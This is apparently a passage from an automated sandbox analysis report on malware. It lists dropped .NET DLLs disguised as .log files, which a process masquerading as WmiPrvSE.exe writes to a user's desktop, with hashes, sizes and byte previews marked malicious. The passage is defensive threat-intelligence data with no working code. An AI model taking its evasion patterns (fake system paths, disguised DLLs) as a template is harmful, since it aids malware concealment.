SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eoNbkqdw.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fkGLlyFI.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fkHAryTS.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fnytvPjf.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\gGCbQipO.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\gUkCADyL.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gmasiRfw.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gqAKFZhr.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\guQJELZU.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\gxIrOcDq.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\haeBUeau.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hdVuXvrH.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hyUuvhPg.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iEOtPIrO.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iayrzvUL.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\ijPsrWTp.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\imHaAnxM.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\infrqIKS.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jFPSHRJE.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jOdAThRi.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\jrYzshHe.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jwQjNADO.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kChIFuMg.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
